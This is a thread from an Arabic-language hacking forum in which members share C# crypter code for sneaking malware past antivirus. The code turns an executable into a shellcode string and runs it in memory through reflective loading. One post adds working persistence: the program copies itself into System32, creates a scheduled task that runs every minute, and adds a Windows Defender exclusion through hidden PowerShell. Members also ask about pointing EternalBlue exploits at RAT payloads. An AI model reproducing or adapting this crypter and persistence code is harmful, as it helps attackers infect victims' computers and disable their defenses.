Hack With ShellCode Clean All + Windows Defender

تم تحميل الصفحة في 1,1241869 ثانية
Hack With ShellCode Clean All + Windows Defender
الحالة
مغلق و غير مفتوح للمزيد من الردود.

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,554
النقاط
173
الإقامة
Germany
حياكم الله ياشباب
انا وعمدور متل كل يوم شفت 2 فانكشن بالجيت هاب
للتحويل من بايت الى سترنج شيل
ومن سترينج شيل الى بايت
هنا رابط الفانكشنس جيبهم من هنا وشوف الفديو
slae/encrypter.cs at a463d135038b9608b28880140207f84194643c54 · reider-roque/slae · GitHub
رابط الفحص
WindowsFormsApp102.exe - Jotti's malware scan
+ بالفديو بتشوف انه كلين كمان من الويندوز ديفيندر
الاكواد النهائية هنا

فقط بعد ان حولت ل سترينج شيل كود جبت القيم
من ملف التكست اللي خليته يكتبهم عليه
ومن ثم وضعتهم بمتغير S
ومن ثم خليته يحولهم ل بايت في اللود عن طريق فانكشن اخرى
الموضوع اهداء
لــ
THE MYSTERIES LEGACY
Grandfather's Legacy
+
Eagle Ray Brooch
+
كــيــرا
+
الاخ علي "حلاج"
+
h!dd3nSniper
+
ᵀᴿᴼᴶᴬᴺ ᴴᴼᴿˁᴱ
+
الاخ حسنين "سيكيوريتي النجف سابقا ""نسيت اسمه الحالي :15:""
بريئ من اي استخدام لمااضعه في معصية لله عز وجل
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,554
النقاط
173
الإقامة
Germany
بدل الفانكشن الخاصة بتحويل البايت الى ستريج شيل
عملت فانكشن للتحويل من هكس سترينج الى سترينج شيل :15:
كود C#
            myString = String.Join(@"\x", str.ToArray());

طبعا مع for عشان نحدد له مقدار الزيادة كل كم عنصر بالهكس سترينج
انه يزيد عليه ال\x
:15:
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,554
النقاط
173
الإقامة
Germany
حبيبي والله بشار
النتيجة كلين :
I love u Bshar.exe - Jotti's malware scan
كيف دعست الحماية اللي بالمقطع هي دائماً بتظهر طريقة دعسها عن طريق حذف هذي الملفين :
مبدع اخي الحبيب
كنت كل مرة بحذفهم بشروحاتي
الاول معلومات اسمبلي الملف والثاني الريسورس
بس لان ماعاد فيه وقت لشي
صاير كثير امور ماعمسويها :15:
نورت اخي :]d (3):
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,554
النقاط
173
الإقامة
Germany
تسلم اخي الحبيب ..،نورت
--------------------
احد من الشباب منزل الطريقة شي .؟!
قلت بتحوز على رضى الجماهير الصاخبه ههه
لان حسب مابعرف ماتم تداولها قبلا ..
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,554
النقاط
173
الإقامة
Germany
اووه مالل بس الميتا روعة رجعتلها :15:
خاصة اننا نقدر نعدل عل الناتج يعني لو مكان هيك الامر ماكان اسمه ذكاء ههه
فينا نعدل على ناتج الثغرة اي ثغرة تقريبا ونخلها تستقبل اوامر vbs او غيره
او تشغل لنا بايتات رات بدل انه يجي اتصال على الميتا بيجي على الرات بس بنفس الثغرة
لسا بدي كم اسبوع بختم الكالي وبجيكم بتعديلاتي :29:
 

Noctis

Active DeveloPer
rankrankrankrank
إنضم
16 مايو 2012
المشاركات
1,487
الإعجابات
1,150
النقاط
113
الإقامة
Morocco
اووه مالل بس الميتا روعة رجعتلها :15:
خاصة اننا نقدر نعدل عل الناتج يعني لو مكان هيك الامر ماكان اسمه ذكاء ههه
فينا نعدل على ناتج الثغرة اي ثغرة تقريبا ونخلها تستقبل اوامر vbs او غيره
او تشغل لنا بايتات رات بدل انه يجي اتصال على الميتا بيجي على الرات بس بنفس الثغرة
لسا بدي كم اسبوع بختم الكالي وبجيكم بتعديلاتي :29:
شكرا لك على شروحاتك .. بصراحة مبدع و فنان ... بالنسبة لاستغلال الثغرات .. يا ريث لو تطرح طريقة لاستغلال ثغرة eternalblue بحيث يصل التبليغ على برنامج الرات و ليس على الميتا او الارميتاج ... لأنني بصراحة أريد أن أجرب لكن للاسف الامتحانات الاسبوع المقبل ( تخصص رياضيات أيضا هههه ) ... و بالنسبة لشروحاتك فهي كثيرة ممكن لو سمحت تخبرني بطريقة واحدة مضمونة للكلين و التخطي مع الدمج بحيث أطبق فقط الخطوات لأنني منذ زمن مبتعد عن الاختراق ..
بالنسبة للسي ++ فأنا أيضا كرهتها هههه و خصوصا في الجامعة لأن الاساتذة أغبياء و لا يفهمون شيئا و شروحاتهم بدائية
لكن شاهد هذا الموضوع
تغيير الروتين و التشفير بالسي ++ و نتيجة قوية ( قابلة للتطوير )
 
إنضم
4 أبريل 2015
المشاركات
326
الإعجابات
264
النقاط
63
حياكم الله ياشباب
انا وعمدور متل كل يوم شفت 2 فانكشن بالجيت هاب
للتحويل من بايت الى سترنج شيل
ومن سترينج شيل الى بايت
هنا رابط الفانكشنس جيبهم من هنا وشوف الفديو
slae/encrypter.cs at a463d135038b9608b28880140207f84194643c54 · reider-roque/slae · GitHub
رابط الفحص
WindowsFormsApp102.exe - Jotti's malware scan
+ بالفديو بتشوف انه كلين كمان من الويندوز ديفيندر
الاكواد النهائية هنا

فقط بعد ان حولت ل سترينج شيل كود جبت القيم
من ملف التكست اللي خليته يكتبهم عليه
ومن ثم وضعتهم بمتغير S
ومن ثم خليته يحولهم ل بايت في اللود عن طريق فانكشن اخرى
الموضوع اهداء
لــ
THE MYSTERIES LEGACY
Grandfather's Legacy
+
Eagle Ray Brooch
+
كــيــرا
+
الاخ علي "حلاج"
+
h!dd3nSniper
+
ᵀᴿᴼᴶᴬᴺ ᴴᴼᴿˁᴱ
+
الاخ حسنين "سيكيوريتي النجف سابقا ""نسيت اسمه الحالي :15:""
بريئ من اي استخدام لمااضعه في معصية لله عز وجل
لماذا عند وضع قيم سرفر يتغير لون الكتابة ولا يطلعلي خطا ولا يشتغل سرفر
 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,554
النقاط
173
الإقامة
Germany
حياك الله
زعيم انت اسطورة في كل الاقسام تضع بصمة
تسلم اخي الحبيب ..مافي شي ممكن اي شخص يعمل احسن مني بكثير
شكرا لك على شروحاتك .. بصراحة مبدع و فنان ... بالنسبة لاستغلال الثغرات .. يا ريث لو تطرح طريقة لاستغلال ثغرة eternalblue بحيث يصل التبليغ على برنامج الرات و ليس على الميتا او الارميتاج ... لأنني بصراحة أريد أن أجرب لكن للاسف الامتحانات الاسبوع المقبل ( تخصص رياضيات أيضا هههه ) ... و بالنسبة لشروحاتك فهي كثيرة ممكن لو سمحت تخبرني بطريقة واحدة مضمونة للكلين و التخطي مع الدمج بحيث أطبق فقط الخطوات لأنني منذ زمن مبتعد عن الاختراق ..
بالنسبة للسي ++ فأنا أيضا كرهتها هههه و خصوصا في الجامعة لأن الاساتذة أغبياء و لا يفهمون شيئا و شروحاتهم بدائية
لكن شاهد هذا الموضوع
تغيير الروتين و التشفير بالسي ++ و نتيجة قوية ( قابلة للتطوير )
تسلم اخي الحبيب على كلامك الطيب
بخصوص اترنال بلو بشوف ان قدرت مارح اقصر اخي
بخصوص الدمج هنا
تلغيم وتفخيخ الملفات الموثوقة Clean VirusTotal لايفوتك حصري :)
بخصوص السي++ والله معك حق الدكاترة اغلبهم بيكرهوك بالمادة هه
ان شاء الله بشوف الموضوع اخي
لماذا عند وضع قيم سرفر يتغير لون الكتابة ولا يطلعلي خطا ولا يشتغل سرفر
وين
System.Reflection.Assembly.load
الخ
وين نقطة الادخال اخي
انت حولت ل بايت طيب مابدك تشغل هالبايت .؟
ارجع شوف الفديو اخي
 
إنضم
7 سبتمبر 2010
المشاركات
3,213
الإعجابات
1,617
النقاط
113
Shell Code tashfera.exe - Jotti's malware scan

تم التشفير جارى عمل اختبار التخطى

وهذا الكود كامل لمن يريده


using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Shell_Code_tashfera
{
static class Program
{
[STAThread]
static void Main()
{

String MicroSoft = "";
System.Reflection.Assembly.Load(ToShellcodeBytes(MicroSoft)).EntryPoint.Invoke(null , null);
}
private static Byte[] ToShellcodeBytes(String shellcode)
{
Byte[] sc_bytes = new Byte[shellcode.Length];
for (Int32 i = 0; i < shellcode.Length; i++)
{
sc_bytes = (Byte) shellcode ;
}

return sc_bytes;
}
}
}

 
إنضم
7 سبتمبر 2010
المشاركات
3,213
الإعجابات
1,617
النقاط
113
وهذا كود التحويل

كود C#
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace WindowsFormsApplication15
{
    static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main()
        {
            File.WriteAllText(@"E:\NEW.txt", ToShellcodeString(File.ReadAllBytes(@"E:\1.exe")));
        }
            private static Byte[] ToShellcodeBytes(String shellcode)
    {
        Byte[] sc_bytes = new Byte[shellcode.Length];
        for (Int32 i = 0; i < shellcode.Length; i++) 
        {
            sc_bytes [i] = (Byte) shellcode [i];
        }

        return sc_bytes;
    }

    private static String ToShellcodeString(Byte[] shellcodeBytes)
    {
        StringBuilder shellcodeStr = new StringBuilder ();

        for (Int32 i = 0; i < shellcodeBytes.Length; i++) 
        {
            shellcodeStr.Append("\\x");
            shellcodeStr.Append(shellcodeBytes [i].ToString("X2"));
        }

        return shellcodeStr.ToString();
    }


}
    }

 

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,554
النقاط
173
الإقامة
Germany
حياكم الله ياشباب
من فترة الاخ DR.JOHNNY طلب مني التالي
عندي طلب صغير مايصعب عليك

ممكن تطبق الفكرة ب c#

اللي في هذا الموضوع للأخ حلاج

Hallaj Bypass windows defender windows 10 forever
الاخ علي نزل لنا موضوعه وفيه السطر هنا لتنفيذه بالباور شيل
ولكن يلزم صلاحيات الادمن
كود C#
Add-MpPreference -ExclusionPath --Path--

بعض الشباب ماعندهم القدرة لتنفيذ سورس
يحوي على تشفير + تثبيت + تخطي الويندوز ديفيندر + تخطي صاحيات الادمن
لذلك هنا شرح لكيفية انه يكون سورس تشفيرك يحتوي على كل ماسبق
بالفديو شرحت كتير كتير ..بس رح حاول اختصر هنا
كود C#
[/CENTER][/COLOR][/FONT][/SIZE][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]static class Microsoft[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]    {[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]     public   static void Windows()[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]        {[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]            System.Reflection.Assembly.Load(Convert.FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQA")).EntryPoint.Invoke(null, null);[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]        }[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]    }[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]
[/COLOR]


كلاس يحول على سورس التشفير خاصتك
ايا كان ضعه داخل الميثود ويندوز
كود C#
[/CENTER][/COLOR][/FONT][/SIZE][/FONT][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]public static bool IsAdministrator()[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]        {[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]            var identity = WindowsIdentity.GetCurrent();[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]            var principal = new WindowsPrincipal(identity);[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]            return principal.IsInRole(WindowsBuiltInRole.Administrator);[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]        }[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]
[/COLOR]


ميثود لفحص ان كان البرنامج المشغل قد تم تشغيله بصلاحيات الادمن لو لا
ليش احتجناها .؟ لان التشغيل الاول للملف رح يكون بصلاحيات الادمن
بس بعد مانثبته بالمهام المجدولة رح يشتغل بشكل عادي لذلك نحن بحاجة if else
كود C#
[/CENTER][/COLOR][/FONT][/SIZE][/FONT][/FONT][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]if (IsAdministrator() == true)[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]            {[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                File.Copy(Application.ExecutablePath, @"C:\Windows\System32\check.exe");[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo { CreateNoWindow = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden, FileName = "schtasks", Arguments = "/create /sc minute /mo 1 /tn " + '"' + "Update" + '"' + " /tr " + '"' + @"C:\Windows\System32\check.exe" + '"' });[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                var dir = Directory.GetCurrentDirectory();[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Process Pro = new Process();[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Pro.StartInfo.RedirectStandardInput = true;[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Pro.StartInfo.FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Pro.StartInfo.RedirectStandardError = true;[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Pro.StartInfo.UseShellExecute = false;[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Pro.StartInfo.CreateNoWindow = true;[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Pro.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Pro.Start();[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Pro.StandardInput.WriteLine($"Add-MpPreference -ExclusionPath {dir}");[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Microsoft.Windows();[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]            }[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]            else[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]            {[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                Microsoft.Windows();[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]            }[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]
[/COLOR]


ناتج السورس هذا سميته 106
ال106 هذا حبيبنا بيعمل لك التالي
"اولا في حال انه اشتغل بصلاحيات الادمن وهذا اللي رح يصير باول تشغيل فقط"
كود C#
 if (IsAdministrator() == true)

كود C#
[/CENTER][/COLOR][/FONT][/SIZE][/FONT][/FONT][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]                File.Copy(Application.ExecutablePath, @"C:\Windows\System32\check.exe");[/COLOR][/FONT][/SIZE]

[SIZE=4][FONT=Times New Roman][COLOR=rgb(0, 0, 0)]

[/COLOR]


بينسخ نفسه للسستم 32 عشان نثبت الملف بالمهام المجدولة ونعرف مساره
"فيه طريقة تانيه بدون ماتنسخه شرحتها بموضوعي الخاص بالتثبيت"
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل